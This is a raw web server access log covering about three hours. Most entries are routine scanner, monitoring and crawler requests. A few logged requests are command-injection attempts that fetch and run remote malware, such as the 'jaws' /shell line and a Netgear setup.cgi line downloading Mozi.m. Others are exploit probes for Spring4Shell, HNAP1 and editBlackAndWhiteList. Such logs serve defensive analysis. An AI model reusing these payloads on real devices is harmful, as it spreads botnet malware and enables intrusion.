54.219.234.89 - - [01/Apr/2022:05:11:29 +0200] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
65.49.20.68 - - [01/Apr/2022:05:14:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
1.64.85.171 - - [01/Apr/2022:05:15:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
188.212.187.99 - - [01/Apr/2022:05:17:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
188.212.187.99 - - [01/Apr/2022:05:17:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
54.149.26.99 - - [01/Apr/2022:05:21:07 +0200] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
61.81.88.119 - - [01/Apr/2022:05:23:55 +0200] "POST /editBlackAndWhiteList HTTP/1.1" 404 326 "-" "Mozila/5.0"
176.233.96.226 - - [01/Apr/2022:05:28:59 +0200] "POST /editBlackAndWhiteList HTTP/1.1" 404 326 "-" "0xAbyssalDoesntExist"
216.218.206.66 - - [01/Apr/2022:05:30:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
74.82.47.2 - - [01/Apr/2022:05:31:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.87.212.180 - - [01/Apr/2022:05:32:52 +0200] "GET http://dyn.epicgifs.net/test6956.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
64.31.7.206 - - [01/Apr/2022:05:34:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
184.105.247.195 - - [01/Apr/2022:05:35:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
13.57.25.74 - - [01/Apr/2022:05:37:09 +0200] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
13.57.225.20 - - [01/Apr/2022:05:38:09 +0200] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
167.94.138.117 - - [01/Apr/2022:05:38:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.117 - - [01/Apr/2022:05:38:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.117 - - [01/Apr/2022:05:38:33 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
64.62.197.152 - - [01/Apr/2022:05:40:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
85.25.185.103 - - [01/Apr/2022:05:44:43 +0200] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0"
85.25.185.103 - - [01/Apr/2022:05:44:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0"
64.31.7.206 - - [01/Apr/2022:05:47:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
64.31.7.206 - - [01/Apr/2022:05:47:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.40.4.128 - - [01/Apr/2022:05:51:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "libwww-perl/6.61"
185.40.4.128 - - [01/Apr/2022:05:51:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "libwww-perl/6.61"
185.40.4.128 - - [01/Apr/2022:05:51:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "libwww-perl/6.61"
185.40.4.128 - - [01/Apr/2022:05:51:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "libwww-perl/6.61"
185.40.4.128 - - [01/Apr/2022:05:51:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "libwww-perl/6.61"
185.40.4.128 - - [01/Apr/2022:05:51:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "libwww-perl/6.61"
185.40.4.128 - - [01/Apr/2022:05:51:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "libwww-perl/6.61"
185.40.4.128 - - [01/Apr/2022:05:51:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "libwww-perl/6.61"
185.40.4.128 - - [01/Apr/2022:05:51:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "libwww-perl/6.61"
185.40.4.128 - - [01/Apr/2022:05:51:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "libwww-perl/6.61"
35.89.30.144 - - [01/Apr/2022:05:54:59 +0200] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
212.192.246.47 - - [01/Apr/2022:05:55:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
64.31.7.206 - - [01/Apr/2022:05:57:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.145.57 - - [01/Apr/2022:05:58:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.145.57 - - [01/Apr/2022:05:58:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.57 - - [01/Apr/2022:05:58:16 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
64.31.7.206 - - [01/Apr/2022:05:59:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.192.246.47 - - [01/Apr/2022:06:03:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
103.178.236.95 - - [01/Apr/2022:06:06:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
103.178.236.95 - - [01/Apr/2022:06:07:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
103.178.236.95 - - [01/Apr/2022:06:07:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
138.118.235.167 - - [01/Apr/2022:06:11:48 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
64.31.7.206 - - [01/Apr/2022:06:13:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
103.178.236.95 - - [01/Apr/2022:06:18:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
64.31.7.206 - - [01/Apr/2022:06:20:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
103.178.236.95 - - [01/Apr/2022:06:21:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
64.31.7.206 - - [01/Apr/2022:06:22:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
103.178.236.95 - - [01/Apr/2022:06:22:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
212.192.246.47 - - [01/Apr/2022:06:23:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.192.246.47 - - [01/Apr/2022:06:23:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
222.233.232.186 - - [01/Apr/2022:06:24:04 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+110.45.146.209/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
103.178.236.95 - - [01/Apr/2022:06:28:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
103.178.236.95 - - [01/Apr/2022:06:31:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
172.104.138.223 - - [01/Apr/2022:06:32:04 +0200] "GET /fuN3 HTTP/1.0" 404 305 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36"
143.198.231.14 - - [01/Apr/2022:06:33:53 +0200] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
64.31.7.206 - - [01/Apr/2022:06:34:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
202.14.122.163 - - [01/Apr/2022:06:39:09 +0200] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://202.14.122.163:44856/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 310 "-" "-"
103.178.236.95 - - [01/Apr/2022:06:44:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
167.248.133.118 - - [01/Apr/2022:06:46:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.118 - - [01/Apr/2022:06:46:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.118 - - [01/Apr/2022:06:46:45 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
143.198.163.225 - - [01/Apr/2022:06:49:28 +0200] "POST /?class.module.classLoader.URLs%5B0%5D=0 HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
143.198.163.225 - - [01/Apr/2022:06:49:29 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
103.178.236.95 - - [01/Apr/2022:06:51:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
103.79.35.126 - - [01/Apr/2022:06:54:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
104.206.128.26 - - [01/Apr/2022:06:59:02 +0200] "GET / HTTP/1.0" 200 1229 "-" "https://gdnplus.com:Gather Analyze Provide."
212.91.246.72 - - [01/Apr/2022:07:00:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:07:01:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:07:02:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:07:03:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.220.3.140 - - [01/Apr/2022:07:03:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.3.140 - - [01/Apr/2022:07:03:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.3.140 - - [01/Apr/2022:07:03:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.3.140 - - [01/Apr/2022:07:04:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [01/Apr/2022:07:04:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.220.3.140 - - [01/Apr/2022:07:05:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
172.245.186.189 - - [01/Apr/2022:07:05:05 +0200] "POST /cgi-bin/index2.asp HTTP/1.1" 404 323 "http://212.91.246.81:80/cgi-bin/index2.asp" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 Edg/93.0.961.44"
31.220.3.140 - - [01/Apr/2022:07:05:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [01/Apr/2022:07:05:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.220.3.140 - - [01/Apr/2022:07:05:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [01/Apr/2022:07:06:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.220.3.140 - - [01/Apr/2022:07:06:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [01/Apr/2022:07:07:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.220.3.140 - - [01/Apr/2022:07:07:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.3.140 - - [01/Apr/2022:07:07:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [01/Apr/2022:07:08:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:07:09:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:07:10:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:07:11:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:07:12:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:07:13:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
170.130.187.34 - - [01/Apr/2022:07:14:07 +0200] "GET / HTTP/1.0" 200 1229 "-" "https://gdnplus.com:Gather Analyze Provide."
212.91.246.72 - - [01/Apr/2022:07:14:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
23.129.64.142 - - [01/Apr/2022:07:14:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
62.102.148.68 - - [01/Apr/2022:07:14:54 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
212.91.246.72 - - [01/Apr/2022:07:15:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.220.3.140 - - [01/Apr/2022:07:16:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.3.140 - - [01/Apr/2022:07:16:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [01/Apr/2022:07:16:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.220.3.140 - - [01/Apr/2022:07:17:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.3.140 - - [01/Apr/2022:07:17:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.3.140 - - [01/Apr/2022:07:17:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [01/Apr/2022:07:17:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.220.3.140 - - [01/Apr/2022:07:17:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
128.14.134.170 - - [01/Apr/2022:07:18:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [01/Apr/2022:07:18:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.220.3.140 - - [01/Apr/2022:07:19:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [01/Apr/2022:07:19:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.220.3.140 - - [01/Apr/2022:07:19:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.3.140 - - [01/Apr/2022:07:20:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [01/Apr/2022:07:20:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:07:21:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:07:22:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:07:23:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:07:24:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:07:25:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.58.119.156 - - [01/Apr/2022:07:26:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [01/Apr/2022:07:26:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
157.245.70.127 - - [01/Apr/2022:07:26:27 +0200] "GET /ab2g HTTP/1.1" 400 329 "-" "-"
157.245.70.127 - - [01/Apr/2022:07:26:27 +0200] "GET /ab2h HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [01/Apr/2022:07:27:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:07:28:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:07:29:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:07:30:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:07:31:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:07:32:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
183.108.148.168 - - [01/Apr/2022:07:33:23 +0200] "POST /editBlackAndWhiteList HTTP/1.1" 404 326 "-" "0xAbyssalDoesntExist"
212.91.246.72 - - [01/Apr/2022:07:33:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:07:34:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:07:35:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
27.47.40.5 - - [01/Apr/2022:07:36:00 +0200] "POST /HNAP1/ HTTP/1.0" 404 311 "-" "-"
212.91.246.72 - - [01/Apr/2022:07:36:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:07:37:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:07:38:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:07:39:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:07:40:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.99.10.170 - - [01/Apr/2022:07:40:55 +0200] "GET /robots.txt HTTP/1.1" 404 334 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
192.99.10.170 - - [01/Apr/2022:07:40:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
212.91.246.72 - - [01/Apr/2022:07:41:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.104.138.223 - - [01/Apr/2022:07:42:24 +0200] "GET /fuN3 HTTP/1.0" 404 305 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36"
212.91.246.72 - - [01/Apr/2022:07:42:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:07:43:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:07:44:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:07:45:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.86.35.17 - - [01/Apr/2022:07:46:21 +0200] "\x16\x03\x01" 501 318 "-" "-"
85.122.144.196 - - [01/Apr/2022:07:46:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [01/Apr/2022:07:46:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:07:47:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:07:48:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:07:49:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:07:50:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
143.198.231.66 - - [01/Apr/2022:07:50:46 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.82:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
212.91.246.72 - - [01/Apr/2022:07:51:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:07:52:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
